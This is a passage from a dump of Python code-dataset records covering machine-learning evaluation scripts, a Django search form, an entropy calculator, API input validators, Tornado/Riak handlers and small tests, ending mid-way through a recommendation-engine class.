rfmodel.predict(X_train)\nY_test_pred = rfmodel.predict(X_test)\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n\n# Visualize Confusion Matrix\nconfusion_matrix_plotter(rfmodel, X_test, Y_test)\n\n\n# print classification report\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate ROC and AUC and plot the curve\nroc_auc_results = calculate_roc_auc(rfmodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\nplot_model_metrics(metrics_dict, 'ROC Curve of Random Forest')\n\n\n# show feature importance\nplot_feature_importance(rfmodel, 'Random Forest - Feature Importance')\n\nresults = pd.DataFrame(model_gs.cv_results_)\nresults.to_csv('Testing/'+source+'_random_forest_report.csv', index = False)\n\n# add metrics to report\nreport.loc[len(report)] = ['Random-Forest', model_gs.best_params_, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n# View a list of the features and their importance scores\nprint(list(zip(X_train, rfmodel.feature_importances_)))\n\n# # part of custom ensemble, DEPRECATED\n# ensemble_y_train_list.append(Y_train_pred)\n# ensemble_y_pred_list.append(Y_test_pred)\n\n\n\n#################################\n# NEEDS TO BE THE LAST MODEL!! # -> if approach with 3 different datasets is used for non-trees, trees and LightGBM\n#################################\n# LightGBM #\n#############\n\n\n# USES THE ORIGINAL DATASET WITHOUT DURATION\nsource = \"BankMarketing\"\n\ndata = pd.read_csv(source+'.csv')\n\ndata = data.drop(columns='duration')\ndata[data.select_dtypes('object').columns.tolist()] = data[data.select_dtypes('object').columns.tolist()].astype('category')\n\n\n# creating X and Y categories\nX = data.copy().drop(columns='y')\nY = data['y']\n\n# different approach due to ensembling with different datasets: select rows by indices of first train_test_split\nfrom sklearn.model_selection import train_test_split\n\n# raised to 0.8\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n\n\n# select same rows as initial train_test_split\n# X_train = X[X.index.isin(X_train_index)]\n# Y_train = Y[Y.index.isin(Y_train_index)]\n# X_test = X[X.index.isin(X_test_index)]\n# Y_test = Y[Y.index.isin(Y_test_index)]\n\n\n\nimport lightgbm as lgb\n\ncat_col = X_train.select_dtypes('object').columns.tolist() + X_train.select_dtypes('category').columns.tolist()\n\n\nd_train = lgb.Dataset(X_train, label=Y_train)\nd_valid = lgb.Dataset(X_test, label=Y_test)\n# for further exploration:\n#d_train = lgb.Dataset(X_train, label=Y_train, feature_name=X_train.columns.tolist(), categorical_feature=cat_col)\n\nprint(X_train.columns.tolist())\n\nmodel_gs_param_grid = {\"max_depth\": [5], \"learning_rate\": [0.005], \"num_leaves\": [31]}\n\n# parameter for lgb.LGBMClassifier(feature_name=X_train.columns.tolist())\nmodel_gs = sk.model_selection.GridSearchCV(estimator=lgb.LGBMClassifier(random_state=0, objective='binary', class_weight='balanced'), param_grid=model_gs_param_grid,\n scoring='accuracy', cv=10, n_jobs=-1)\nmodel_gs.fit(X_train, Y_train)\n\n\n# create model using the optimal parameters\nlgbmodel = model_gs.best_estimator_\nlgbmodel.fit(X_train, Y_train)\nY_train_pred = lgbmodel.predict(X_train)\nY_test_pred = lgbmodel.predict(X_test)\n\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n\n# Visualize Confusion Matrix\nconfusion_matrix_plotter(lgbmodel, X_test, Y_test)\n\n\n# print classification report\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate ROC and AUC and plot the curve\nroc_auc_results = calculate_roc_auc(lgbmodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\nplot_model_metrics(metrics_dict, 'ROC Curve of LightGBM')\n\n\n# show feature importance\nplot_feature_importance(lgbmodel, 'LightGBM - Feature Importance')\n\nreport.loc[len(report)] = ['LightGBM Classifier', model_gs.best_params_, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n\nresults = pd.DataFrame(model_gs.cv_results_)\nresults.to_csv('Testing/'+source+'_lightGBM_report.csv', index = False)\n\n\n# # part of custom ensemble, DEPRECATED\n# ensemble_y_train_list.append(Y_train_pred)\n# ensemble_y_pred_list.append(Y_test_pred)\n\n\n#\n# #############################\n# # Ensemble #\n# #############################\n#\n# from mlxtend.classifier import EnsembleVoteClassifier\n#\n# # use Gini Decision Tree, Random Forest, LightGBM\n# list_classifiers = [gtmodel, rfmodel, lgbmodel]\n#\n# # hard voting because soft voting did not improve results\n# ens_model = EnsembleVoteClassifier(clfs=list_classifiers)\n# accuracies = cross_val_score(ens_model,X_train,Y_train,scoring='accuracy',cv=10)\n#\n# ens_model.fit(X_train,Y_train)\n#\n# Y_train_pred = ens_model.predict(X_train)\n# Y_test_pred = ens_model.predict(X_test)\n#\n#\n# # calculate cmtr, acctr, cmte, accte\n# metrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n#\n# # Visualize Confusion Matrix\n# confusion_matrix_plotter(ens_model, X_test, Y_test)\n#\n# # print classification report\n# print('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n#\n#\n# # calculate precision & recall metrics\n# metrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n#\n#\n# # calculate f1 score\n# metrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n#\n#\n# # calculate ROC and AUC and plot the curve\n# roc_auc_results = calculate_roc_auc(ens_model, X_test, Y_test)\n# metrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\n# metrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\n# metrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\n# plot_model_metrics(metrics_dict, 'ROC Curve of Ensemble')\n#\n# # add to the report\n# report.loc[len(report)] = ['Ensemble', None, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n#\n# print(report)\n#\n\n\n# NOT IN USE ANYMORE, approach to create a CUSTOM ENSEMBLE with different datasets for the different models\n# print(\"Y_test is equals to Y_test_global: \", Y_test.equals(y_test_global))\n#\n# (for optimized results per model)\n# ensemble results for: Gini Decision Tree, Random Forest, LightGBM\n# def get_ensemble_result(list_):\n# print(list_)\n# for j in list_:\n# print(j)\n# y_predictions = pd.DataFrame({0:list_[0], 1:list_[1], 2:list_[2]})\n# no_of_cols = len(y_predictions.columns)\n# threshold = no_of_cols/2\n# Y_ensemble_results = y_predictions.apply(lambda x: \"yes\" if ((x.value_counts().yes > 2) if hasattr(x.value_counts(), 'yes') else (x.value_counts().no<2)) else \"no\", axis=1)\n# print(Y_ensemble_results)\n# return Y_ensemble_results\n#\n# Y_train_pred_ensemble = get_ensemble_result(ensemble_y_train_list)\n# Y_test_pred_ensemble = get_ensemble_result(ensemble_y_pred_list)\n\n# calculate cmtr, acctr, cmte, accte\n# metrics_dict = calculate_metrics(y_train_global, y_test_global, Y_train_pred_ensemble, Y_test_pred_ensemble)\n#\n#\n#\n# # print classification report\n# print('Classification Report \\n', classification_report(y_test_global, Y_test_pred_ensemble))\n#\n#\n# # calculate precision & recall metrics\n# metrics_dict.update(calculate_precision_recall(y_test_global, Y_test_pred_ensemble))\n#\n#\n# # calculate f1 score\n# metrics_dict[\"f1te\"] = calculate_f1_score(y_test_global, Y_test_pred_ensemble)\n\n\n#############################\n# PRINT THE FINAL REPORT #\n#############################\n\n#report.to_csv('Testing/report_all_'+source+'.csv', index=False)\nreport.to_csv('Testing/report_all_final_data.csv', index=False)\n\nprint(\"stop\")\n\n\n\n\"\"\"\n\n#############################\n# Lime #\n#############################\n\nimport lime\nimport lime.lime_tabular\n\n# look for values that \nprint(Y_test.head(30))\n\npredict_fn = lambda x: rfmodel.predict_proba(x).astype(float)\nX = X_train.values\nexplainer = lime.lime_tabular.LimeTabularExplainer(X,feature_names= X_train.columns,class_names=['no', 'yes'],kernel_width=5)\n\nchosen_customer = X_test.loc[[7672]].values[0]\nexplanation = explainer.explain_instance(chosen_customer,predict_fn,num_features=10)\nfig1 = explanation.as_pyplot_figure();\n\nfig1.tight_layout()\nplot.savefig('lime_fig1.png', dpi=300)\n\n# for notebook output\nexplanation.show_in_notebook(show_all=False)\n\n\nchosen_customer_2 = X_test.loc[[28335]].values[0]\nexplanation = explainer.explain_instance(chosen_customer_2,predict_fn,num_features=10)\nfig2 = explanation.as_pyplot_figure();\n\nfig2.tight_layout()\nplot.savefig('lime_fig2.png', dpi=300)\n\n# for notebook output\nexplanation.show_in_notebook(show_all=False)\n\n\"\"\"\n\n\"\"\"\n#############################\n# Shap #\n#############################\nimport shap\n# for trees\nshap_explainer = shap.TreeExplainer(ens_model) #again replace model if needed\n# for non-trees -> NOTE: does not work for (voting) ensembles (not implemented in SHAP yet)\n#shap_explainer = shap.KernelExplainer(ens_model, X_train) #again replace model if needed\ntest_shap_vals = shap_explainer.shap_values(X_test)\n# test_shap_vals index 0 is impact on outcome=\"yes\", 1 is impact on outcome=\"no\"\nshap.summary_plot(test_shap_vals[0], X_test)\n\n\"\"\"\n","sub_path":"BankMarketing_ensemble_for_snippets.py","file_name":"BankMarketing_ensemble_for_snippets.py","file_ext":"py","file_size_in_byte":38603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"123813048","text":"from typing import List, Optional\n\nfrom crispy_forms.bootstrap import Accordion, AccordionGroup\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import HTML, Div, Field, Layout, Submit\nfrom django import forms\nfrom django.db.models import QuerySet\nfrom django.http import HttpRequest\nfrom django_select2.forms import Select2MultipleWidget\n\nfrom entities.models import Entity\nfrom modularhistory.constants.strings import EMPTY_STRING\nfrom modularhistory.forms import HistoricDateFormField\nfrom modularhistory.widgets.historic_date_widget import YearInput\nfrom search.models import CONTENT_TYPE_OPTIONS, ORDERING_OPTIONS\nfrom topics.models import Topic\n\nAccordion.template = 'forms/_accordion.html'\nAccordionGroup.template = 'forms/_accordion_group.html'\n\n\nclass SearchForm(forms.Form):\n \"\"\"Form for searching for searchable model instances.\"\"\"\n\n submit_button_text = 'Search'\n\n def __init__(\n self,\n request: HttpRequest,\n query: Optional[str] = None,\n suppress_unverified: bool = True,\n order_by_relevance: bool = False,\n excluded_content_types: List[int] = None,\n entities: Optional['QuerySet[Entity]'] = None,\n topics: Optional['QuerySet[Topic]'] = None,\n collapse_refinements: bool = False,\n *args,\n **kwargs,\n ):\n \"\"\"Construct the search form.\"\"\"\n super().__init__(*args, **kwargs)\n excluded_content_types = excluded_content_types or []\n self.request = request\n self.fields['query'] = forms.CharField(required=False, initial=query)\n ordering = 'relevance' if order_by_relevance else 'date'\n self.fields['ordering'] = forms.ChoiceField(\n choices=ORDERING_OPTIONS,\n widget=forms.RadioSelect,\n initial=ordering,\n required=False,\n )\n\n # TODO: refactor (to not increase queries/page load time)\n this_code_is_efficient = False\n if this_code_is_efficient:\n # Disable sorting by relevance if there are no criteria\n if not any([query, entities, topics]):\n self.fields['ordering'].widget.attrs['disabled'] = True\n\n # Filter unverified items\n quality = 'verified' if suppress_unverified else 'unverified'\n self.fields['quality'] = forms.ChoiceField(\n choices=(('verified', 'Verified'), ('unverified', 'Unverified')),\n widget=forms.RadioSelect,\n initial=quality,\n required=False,\n )\n if not self.request.user.is_superuser:\n self.fields['quality'].widget.attrs['disabled'] = True\n\n # TODO: optimize\n initial_content_types = [\n pk for pk, name in CONTENT_TYPE_OPTIONS if pk not in excluded_content_types\n ]\n self.fields['content_types'] = forms.MultipleChoiceField(\n choices=CONTENT_TYPE_OPTIONS,\n widget=forms.CheckboxSelectMultiple,\n initial=initial_content_types,\n required=False,\n )\n\n self.fields['start_year'] = HistoricDateFormField(\n required=False, widget=YearInput\n )\n self.fields['end_year'] = HistoricDateFormField(\n required=False, widget=YearInput\n )\n\n self.fields['entities'] = forms.ModelMultipleChoiceField(\n queryset=(entities or Entity.objects.all().only(*Entity.searchable_fields)),\n widget=Select2MultipleWidget,\n required=False,\n )\n self.fields['topics'] = forms.ModelMultipleChoiceField(\n queryset=(topics or Topic.objects.all().only(*Topic.searchable_fields)),\n widget=Select2MultipleWidget,\n required=False,\n )\n\n # https://django-crispy-forms.readthedocs.io/en/latest/form_helper.html\n self.helper = FormHelper()\n self.helper.form_id = 'refineSearchForm'\n self.helper.form_method = 'get'\n self.helper.form_action = 'search'\n self.helper.form_class = ''\n self.helper.field_class = ''\n self.helper.label_class = ''\n\n refinements = [\n Div('start_year', css_class=EMPTY_STRING),\n Div('end_year', css_class=EMPTY_STRING),\n Field('entities', css_class=EMPTY_STRING),\n Field('topics', css_class=EMPTY_STRING),\n Div('quality', css_class=EMPTY_STRING),\n Div('content_types', css_class=EMPTY_STRING),\n ]\n\n caret = (\n ''\n ''\n )\n\n layout = flexbox_holy_albatross(\n Field('query', css_class='form-control'),\n Field('ordering', css_class=EMPTY_STRING),\n )\n if collapse_refinements:\n layout += card(\n HTML(\n f'''\n \n
\n
\n '''\n ),\n *refinements,\n HTML('
'),\n )\n else:\n layout += flexbox_holy_albatross(*refinements)\n layout.append(Submit('submit', self.submit_button_text))\n self.helper.layout = Layout(*layout)\n\n\ndef card(*layout_items) -> List:\n \"\"\"Return crispy form layout items wrapped in a card.\"\"\"\n return [HTML('
'), *layout_items, HTML('
')]\n\n\ndef flexbox_holy_albatross(*layout_items) -> List:\n \"\"\"Return crispy form layout items wrapped in a flexbox holy albatross.\"\"\"\n return [HTML('
'), *layout_items, HTML('
')]\n","sub_path":"search/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"457562776","text":"#Author: Alex Peplinski\n\"\"\"\nEFFECTS: calculates entropy of the setup.py file or any file\nthis code is Adapted from FB36 a contributor on https://code.activestate.com/recipes/577476-shannon-entropy-calculation/#c3\n file_entropy.py\n Shannon Entropy of a file\n = minimum average number of bits per character\n required for encoding (compressing) the file\n So the theoretical limit (in bytes) for data compression:\n Shannon Entropy of the file * file size (in bytes) / 8\n (Assuming the file is a string of byte-size (UTF-8?) characters\n because if not then the Shannon Entropy value would be different.)\n FB - 201011291\n\"\"\"\n#This code is adapted from author FB36 a contributor on https://code.activestate.com/recipes/577476-shannon-entropy-calculation/#c3\nimport sys\nimport math\nfrom os.path import abspath, dirname, join\n#from __future__ import division\n#from collections import Counter\n#import math\n\n\ndef entropy_calculator(entropy_file):\n \"\"\"\n Purpose: read the whole file into a byte array\n \"\"\"\n f = open(entropy_file, \"rb\")\n byteArr = f.read()\n f.close()\n fileSize = len(list(byteArr))\n\n # calculate the frequency of each byte value in the file\n freqList = []\n for b in range(256):\n ctr = 0\n for byte in byteArr:\n if byte == b:\n ctr += 1\n freqList.append(float(ctr) / fileSize)\n # Shannon entropy\n ent = 0.0\n for freq in freqList:\n if freq > 0:\n ent = ent + freq * math.log(freq, 2)\n ent = -ent\n return ent\n\n\ndef entropy_test():\n \"\"\"\n Purpose: Tests entropy calculation\n \"\"\"\n entropy_file = abspath(\n join(dirname(__file__), './test_entropy.py'))\n extracted_data = entropy_calculator(entropy_file)\n\n\nif __name__ == '__main__':\n entropy_test()\n","sub_path":"Pyteria/Modules/file_entropy_calculator.py","file_name":"file_entropy_calculator.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"576201229","text":"import numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nimport japanize_matplotlib\n\n# 多重対応分析\nimport mca\n\n# 遊び特徴量の出力先\nOUTPUT_LOCATION = '/home/workspace/recommendation_models/data/'\nOUTPUT_FILENAME = 'fun_data.csv'\n\ndef run(json, visualization=False):\n playlist = _data_processing(json)\n fun_features = _calc_mca(playlist, visualization)\n # 遊びの名前の追加\n fun_data = pd.concat([_get_fun_names(json),fun_features], axis=1)\n # CSVへ書き出す\n fun_data.to_csv(OUTPUT_LOCATION+OUTPUT_FILENAME, index=True)\n\ndef _data_processing(json):\n df_json = _json2dataframe(json)\n dp_json = _data_cleansing(df_json)\n return dp_json\n \ndef _json2dataframe(json):\n for i, one_json in enumerate(json):\n shaping_json = {'calumns': one_json} \n input_json = str(shaping_json).replace(\"'\", '\"')\n se_json = pd.read_json(input_json) # json to Series\n # 初回だけdfにseを代入し,2回目以降はdfとseを結合する\n df_json = se_json if i == 0 else pd.concat([df_json, se_json], axis=1)\n df_json = df_json.reindex(index=json[0].keys()) # indexの順番をjsonと同じにする\n return df_json\n\ndef _data_cleansing(df_json):\n df_json.columns = df_json.loc['id'] # カラム名を遊びIDに変更\n df_json.drop(['created_at','updated_at','name','id'], inplace=True) # いらん情報を削除\n df_json = df_json.T # 転置\n return df_json\n\ndef _calc_mca(playlist, visualization):\n mca_counts = mca.MCA(playlist.astype(float)) # 値がfloatじゃないとエラー出る\n # 結果データ抜き出し\n # 2次元表示のためN=2とする\n rows = mca_counts.fs_r(N=2) # 表側データ\n cols = mca_counts.fs_c(N=2) # 表頭データ\n if visualization == True:\n _visualize(playlist, rows, cols)\n return pd.DataFrame(rows).set_index(playlist.index)\n\n# 結果の可視化\ndef _visualize(playlist, rows, cols):\n fig = plt.figure()\n # 表側\n plt.scatter(rows[:, 0], rows[:, 1], c='b', marker=\"None\")\n labels = playlist.index\n for label, x, y in zip(labels, rows[:, 0], rows[:, 1]):\n plt.annotate(label, xy=(x, y), c=\"b\")\n # 表頭\n plt.scatter(cols[:, 0], cols[:, 1], c='r', marker=\"None\")\n labels = playlist.columns\n for label, x, y in zip(labels, cols[:, 0], cols[:, 1]):\n plt.annotate(label, xy=(x, y), c=\"r\")\n # xy軸\n plt.axhline(0, color='gray')\n plt.axvline(0, color='gray')\n \n fig.savefig(OUTPUT_LOCATION+'visualization.png')\n \n# 遊びの名前を取ってくる\ndef _get_fun_names(json):\n df_json = _json2dataframe(json)\n df_json.columns = df_json.loc['id']\n df_fun_names = df_json.loc['name']\n return pd.DataFrame(df_fun_names)\n \n","sub_path":"ml_models/recommendation_models/multiple_correspondence_analysis.py","file_name":"multiple_correspondence_analysis.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"278119559","text":"from datetime import datetime\n\nfrom jsonschema import validate, Draft7Validator, FormatChecker\n\n\ndef is_interval_time(s: str) -> bool:\n if len(s) != 11 or s.find('-') != 5 or len(s.split('-')) != 2:\n return False\n helper = s.split('-')\n try:\n datetime.strptime(helper[0], \"%H:%M\").time()\n datetime.strptime(helper[1], \"%H:%M\").time()\n return True\n except ValueError:\n return False\n\n\ndef is_str_datetime_iso8601(date: str):\n try:\n _ = datetime.strptime(date, '%Y-%m-%dT%H:%M:%S.%f%z')\n return True\n except ValueError:\n return False\n\n\ndef is_positive_int(x: int) -> bool:\n if x <= 0:\n return False\n return True\n\n\ndef is_available_weight(x: float):\n if x > 50 or x < 0.01:\n return False\n return True\n\n\nclass Validation:\n def __init__(self):\n self.checker = FormatChecker()\n self.checker.checks(\"interval_time\")(is_interval_time)\n self.checker.checks(\"positive_int\")(is_positive_int)\n self.checker.checks(\"available_weight\")(is_available_weight)\n self.checker.checks(\"format_iso_8601\")(is_str_datetime_iso8601)\n\n def is_valid_courier(self, courier) -> bool:\n schema = {\n \"type\": \"object\",\n \"properties\": {\n \"courier_id\": {\"type\": \"integer\", \"format\": \"positive_int\"},\n \"courier_type\": {\"type\": \"string\", \"enum\": [\"foot\", \"bike\", \"car\"]},\n \"regions\": {\"type\": \"array\", \"items\": {\"type\": \"integer\", \"format\": \"positive_int\"}},\n \"working_hours\": {\"type\": \"array\", \"items\": {\"type\": \"string\", \"format\": \"interval_time\"}},\n },\n \"required\": [\n \"courier_id\",\n \"courier_type\",\n \"regions\",\n \"working_hours\"\n ],\n \"additionalProperties\": False\n }\n return Draft7Validator(schema, format_checker=self.checker).is_valid(courier)\n\n def is_valid_order(self, order) -> bool:\n schema = {\n \"type\": \"object\",\n \"properties\": {\n \"order_id\": {\"type\": \"integer\", \"format\": \"positive_int\"},\n \"weight\": {\"type\": \"number\", \"format\": \"available_weight\"},\n \"region\": {\"type\": \"integer\", \"format\": \"positive_int\"},\n \"delivery_hours\": {\"type\": \"array\", \"items\": {\"type\": \"string\", \"format\": \"interval_time\"}},\n },\n \"required\": [\n \"order_id\",\n \"weight\",\n \"region\",\n \"delivery_hours\"\n ],\n \"additionalProperties\": False\n }\n return Draft7Validator(schema, format_checker=self.checker).is_valid(order)\n\n def is_valid_json_add_courier(self, json_) -> bool:\n not_valid = []\n if json_ is None or not ('data' in json_.keys()):\n return False\n for item in json_['data']:\n if not self.is_valid_courier(item):\n not_valid.append({\"id\": item['courier_id']})\n return not_valid\n\n def is_valid_json_edit_info_courier(self, courier) -> bool:\n schema = {\n \"type\": \"object\",\n \"properties\": {\n \"courier_type\": {\"type\": \"string\", \"enum\": [\"foot\", \"bike\", \"car\"]},\n \"regions\": {\"type\": \"array\", \"items\": {\"type\": \"integer\", \"format\": \"positive_int\"}},\n \"working_hours\": {\"type\": \"array\", \"items\": {\"type\": \"string\", \"format\": \"interval_time\"}},\n },\n \"additionalProperties\": False\n }\n return Draft7Validator(schema, format_checker=self.checker).is_valid(courier)\n\n def is_valid_json_add_orders(self, order) -> bool:\n not_valid = []\n if order is None or not ('data' in order.keys()):\n return False\n for item in order['data']:\n if not self.is_valid_order(item):\n not_valid.append({\"id\": item['order_id']})\n return not_valid\n\n def is_valid_json_orders_assign(self, json_):\n schema = {\n \"type\": \"object\",\n \"properties\": {\n \"courier_id\": {\"type\": \"integer\", \"format\": \"positive_int\"}\n },\n \"required\": [\n \"courier_id\"\n ],\n \"additionalProperties\": False\n }\n\n return Draft7Validator(schema, format_checker=self.checker).is_valid(json_)\n\n def is_valid_json_order_complete(self, json_):\n schema = {\n \"type\": \"object\",\n \"properties\": {\n \"courier_id\": {\n \"type\": \"integer\",\n \"format\": \"positive_int\"\n },\n \"order_id\": {\n \"type\": \"integer\",\n \"format\": \"positive_int\"\n },\n \"complete_time\": {\n \"type\": \"string\",\n \"format\": \"format_iso_8601\"\n }\n },\n \"additionalProperties\": False\n }\n\n return Draft7Validator(schema, format_checker=self.checker).is_valid(json_)\n\n\n\n\n\n\n\n\n","sub_path":"app/delivery/Validation.py","file_name":"Validation.py","file_ext":"py","file_size_in_byte":5091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"11431290","text":"'''\nLeetcode- 354. Russian Doll Envelopes - Time limit exceeded\ntime complexity - O(N2)\nspace complexity -O(N)\nApproach - DP\n\n'''\nclass Solution:\n retval=1\n def maxEnvelopes(self, envelopes: List[List[int]]) -> int:\n if len(envelopes)==0: return 0\n envelopes.sort(key=lambda x:x[0])\n \n \n dp =[1 for _ in range(len(envelopes))]\n for i in range(1,len(envelopes)):\n maxsub=0\n for j in range(i):\n if envelopes[i][0]>envelopes[j][0] and envelopes[i][1]>envelopes[j][1]:\n maxsub=max(maxsub,dp[j])\n dp[i]=dp[i]+maxsub\n self.retval=max(self.retval,dp[i])\n \n \n return self.retval\n \n \n ","sub_path":"Problem-151.py","file_name":"Problem-151.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"302960927","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n tornado-riak\n\n Copyright (c) 2012-2013 apitrary\n\n\"\"\"\nimport logging\nimport riak\nimport tornado.ioloop\nimport tornado.web\nimport tornado.escape\nimport tornado.httpserver\nimport tornado.httputil\nfrom tornado.options import options\nfrom tornadoriak.errors import NoDictionaryException\nfrom tornadoriak.response_types import ErrorResponse\nfrom tornadoriak.response_types import Response\n\n\nclass BaseHandler(tornado.web.RequestHandler):\n \"\"\"\n The most general handler class. Should be sub-classed by all consecutive\n handler classes.\n \"\"\"\n\n def __init__(self, application, request, **kwargs):\n super(BaseHandler, self).__init__(application, request, **kwargs)\n\n self.riak_http_client = riak.RiakClient(host=options.riak_host, port=options.riak_http_port,\n transport_class=riak.RiakHttpTransport)\n self.riak_pb_client = riak.RiakClient(host=options.riak_host, port=options.riak_pb_port,\n transport_class=riak.RiakPbcTransport)\n # Use Protobuf as default\n self.client = self.riak_pb_client\n\n def set_default_headers(self):\n self.set_header(\"Access-Control-Allow-Origin\", '*')\n self.set_header(\"Access-Control-Allow-Methods\", \"GET,PUT,POST,DELETE,OPTIONS\")\n self.set_header(\"Access-Control-Allow-Headers\", \"Content-Type, Depth, User-Agent, X-File-Size, \"\n \"X-Requested-With, X-Requested-By, If-Modified-Since, \"\n \"X-File-Name, Cache-Control, X-Api-Key\")\n\n def options(self, *args, **kwargs):\n \"\"\"\n Returning back the list of supported HTTP methods\n \"\"\"\n self.set_status(200)\n self.set_header(\"Access-Control-Allow-Origin\", \"*\")\n self.set_header(\"Access-Control-Allow-Methods\", ', '.join([str(x) for x in self.SUPPORTED_METHODS]))\n self.write(\"ok\")\n\n def respond(self, payload, status_code=200, status_message='OK'):\n \"\"\"\n The general responder for ALL cases (success response, error response)\n \"\"\"\n if payload is None:\n payload = {}\n\n if type(payload) not in [dict, list]:\n logging.error('payload is: {}'.format(payload))\n logging.error('payload is type: {}'.format(type(payload)))\n raise NoDictionaryException()\n\n response = Response(status_code=status_code, status_message=status_message, result=payload).get_data()\n self.set_status(status_code)\n self.set_header(\"Content-Type\", \"application/json; charset=UTF-8\")\n self.write(response)\n\n def write_error(self, status_code, **kwargs):\n \"\"\"\n Called automatically when an error occurred. But can also be used to\n respond back to caller with a manual error.\n \"\"\"\n if 'exc_info' in kwargs:\n logging.error(repr(kwargs['exc_info']))\n\n message = 'Something went seriously wrong! Maybe invalid resource? Ask your admin for advice!'\n if 'message' in kwargs:\n message = kwargs['message']\n\n response = ErrorResponse(error_message=message)\n\n self.set_status(status_code)\n self.set_header(\"Content-Type\", \"application/json; charset=UTF-8\")\n self.write(response.get_data())\n","sub_path":"tornadoriak/base_handlers.py","file_name":"base_handlers.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"405226224","text":"# -*- coding: utf-8 -*-\nfrom nose.tools import raises\nfrom toucan.tests.helpers import chdir\nfrom toucan.jobs.basic import FileJob\n\n\n@raises(RuntimeError)\ndef test_up_to_date():\n chdir(\"file_job\")\n j = FileJob(\"old_file\", [\"new_file\"])\n assert not j.up_to_date()\n j = FileJob(\"not_existent\", [\"new_file\"])\n assert not j.up_to_date()\n j = FileJob(\"new_file\", [\"old_file\"])\n assert j.up_to_date()\n j = FileJob(\"new_file\", [\"not_existent\"])\n j.up_to_date()\n\n\n@raises(NotImplementedError)\ndef test_run():\n chdir(\"file_job\")\n j = FileJob(\"not_existent\", [])\n j.run()\n","sub_path":"toucan/tests/test_file_job.py","file_name":"test_file_job.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"240736310","text":"# -*- coding: utf-8 -*- \nfrom fonctions_utiles import vraisemblance, esperanceVraisemblance\nfrom scipy import optimize\nimport theme, competence, etudiant, exercice\n\n\n\nclass Main(object):\n \"\"\"Moteur de l'algorithme de recommendation 'Apprentissage adaptatif' \"\"\"\n\n #--------------------------------------------------------------------------\n \n def __init__(self, etudiants={}, themes={}, competences={}, exercices={}, questions={}):\n self.etudiants = etudiants\n self.themes = themes\n self.competences = competences\n self.exercices = exercices\n \n \n #--------------------------------------------------------------------------\n\n \n def actualiserNiveaux(self, idEtudiant):\n etudiant = self.etudiants[idEtudiant]\n exercices = [self.exercices[i] for i in etudiant.resultats if etudiant.resultats[i]!=-1]\n reponses = [etudiant.resultats[i] for i in etudiant.resultats if etudiant.resultats[i]!=-1]\n matriceQ = [[1 if k in exo.competences else 0 for k in self.competences.values()] for exo in exercices]\n \n bnds = [[-1, 1]]*len(self.competences)\n f = lambda x : -vraisemblance(exercices, x, matriceQ, reponses)\n opt = optimize.minimize(f, [0]*len(self.competences), bounds=bnds)\n# print(opt.x)\n# print(-opt.fun)\n maj={}\n i=1\n for items in opt.x:\n maj[i]=items\n i+=1\n etudiant.setNiveaux(maj)\n \n \n \n def genererFE(self, idEtudiant, idCompetences, nbExercices, ajouter_prerequis=False):\n \"\"\"Génère une Feuille d'Exercices correspondant à un élève et à des compétences\"\"\"\n competences = [self.competences[i] for i in idCompetences]\n if 